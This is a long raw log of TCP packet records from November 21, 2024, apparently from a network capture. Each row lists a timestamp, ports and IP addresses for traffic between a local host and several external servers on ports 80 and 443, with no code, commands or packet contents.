                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.608875036 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.615782022 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.615842104 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.615849018 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.615895033 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.615925074 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.624062061 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.624118090 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.624144077 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.624152899 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.624193907 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.632150888 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.632230043 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.632237911 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.632267952 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.632327080 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.632333994 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.639877081 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.639919996 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.639959097 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.639969110 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.639997005 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.648047924 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.648106098 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.648137093 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.648144007 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.648173094 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.656173944 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.656218052 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.656255960 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.656264067 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.656290054 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.693469048 CET4435003113.91.222.61192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.693933010 CET4435003113.91.222.61192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.694001913 CET50031443192.168.2.513.91.222.61
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.780806065 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.780824900 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791625023 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791646004 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791667938 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791687965 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791692019 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791697979 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791721106 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791728973 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791780949 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791800022 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791807890 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791907072 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.791976929 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.792026043 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.794778109 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.794786930 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.794811964 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.794842958 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.794861078 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.794886112 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.794902086 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.797363043 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.797380924 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.797456026 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.797472954 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.797497034 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.797518015 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.799875021 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.799895048 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.799936056 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.799942970 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.799973011 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.799982071 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.803241968 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.803261995 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.803328991 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.803335905 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.803378105 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.806051016 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.806066036 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.806128979 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.806137085 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.806173086 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.808573961 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.808600903 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.808639050 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.808645964 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.808677912 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.808690071 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.847491026 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.847517014 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.847569942 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.847583055 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.847625017 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.983562946 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.983616114 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.983640909 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.983656883 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.983685017 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.983695984 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.983702898 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.986735106 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.986757994 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.986834049 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.986845016 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.989356995 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.989408970 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.989418983 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.989444971 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.989474058 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.992656946 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.992706060 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.992726088 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.992733955 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.992784977 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.992814064 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.992880106 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.995223999 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.995242119 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.995289087 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.995301962 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.995330095 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.995347023 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.997956038 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.997997999 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.998024940 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.998033047 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.998060942 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.998076916 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:14.998083115 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.000569105 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.000607967 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.000634909 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.000643015 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.000660896 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.039606094 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.039666891 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.039680004 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.039693117 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.039721966 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.082798958 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.082807064 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.175894022 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.175919056 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.175942898 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.175966024 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.175980091 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.176017046 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.178791046 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.178813934 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.178857088 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.178857088 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.178877115 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.178904057 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.178911924 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.178935051 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.181281090 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.181307077 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.181314945 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.181330919 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.181340933 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.181349993 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.181366920 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.181399107 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.182122946 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.182216883 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.182223082 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.182245970 CET4435001323.44.203.17192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.182261944 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.182293892 CET50013443192.168.2.523.44.203.17
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.689629078 CET4435004113.91.222.61192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.738806009 CET50041443192.168.2.513.91.222.61
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.921036005 CET5003380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:15.921305895 CET5004680192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:16.042260885 CET8050046185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:16.042594910 CET8050033185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:16.043103933 CET5003380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:16.043171883 CET5004680192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:16.047354937 CET5004680192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:16.166873932 CET8050046185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:17.390492916 CET8050046185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:17.390604019 CET5004680192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:19.013130903 CET5004680192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:19.013828993 CET5005380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:19.133099079 CET8050046185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:19.133440018 CET8050053185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:19.133558035 CET5005380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:19.133560896 CET5004680192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:19.133815050 CET5005380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:19.253353119 CET8050053185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:20.571755886 CET8050053185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:20.572067022 CET5005380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:21.814426899 CET49942443192.168.2.5142.250.181.100
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:21.814426899 CET49945443192.168.2.5142.250.181.100
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:21.814512014 CET49944443192.168.2.5142.250.181.100
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:21.814527035 CET49946443192.168.2.5142.250.181.100
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.087846994 CET5005380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.088146925 CET5005980192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.208863974 CET8050059185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.208981991 CET5005980192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.209006071 CET8050053185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.209224939 CET5005380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.216917038 CET5005980192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.336664915 CET8050059185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.949583054 CET44349990162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.949667931 CET44349990162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:22.949806929 CET49990443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.025988102 CET44349991162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.026179075 CET44349991162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.026283979 CET49991443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.263968945 CET44349994162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.264034986 CET44349994162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.264143944 CET49994443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.272833109 CET44349995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.272914886 CET44349995162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.272986889 CET49995443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.299128056 CET44349993162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.299300909 CET44349993162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.299407959 CET49993443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.310851097 CET44349996162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.310918093 CET44349996162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.310987949 CET49996443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.554280043 CET8050059185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.557490110 CET5005980192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.169558048 CET5005980192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.169858932 CET5007080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.295108080 CET8050070185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.295195103 CET5007080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.295269012 CET8050059185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.295483112 CET5007080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.295588017 CET5005980192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.414908886 CET8050070185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.939173937 CET44350012162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.939227104 CET44350012162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.941272974 CET50012443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.976933956 CET44350011162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.977003098 CET44350011162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.977067947 CET50011443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:26.627410889 CET8050070185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:26.627619982 CET5007080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:28.143053055 CET5007080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:28.143357992 CET5007380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:28.262885094 CET8050073185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:28.262949944 CET8050070185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:28.262989998 CET5007380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:28.263015985 CET5007080192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:28.263384104 CET5007380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:28.385205030 CET8050073185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:29.039386988 CET44350005104.126.116.98192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:29.039480925 CET44350005104.126.116.98192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:29.039557934 CET50005443192.168.2.5104.126.116.98
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:29.654611111 CET8050073185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:29.655150890 CET5007380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:31.294922113 CET5007380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:31.295334101 CET5007580192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:31.414911985 CET8050073185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:31.414932966 CET8050075185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:31.415107012 CET5007380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:31.415364981 CET5007580192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:31.415364981 CET5007580192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:31.490315914 CET4435002423.57.90.111192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:31.490459919 CET4435002423.57.90.111192.168.2.5
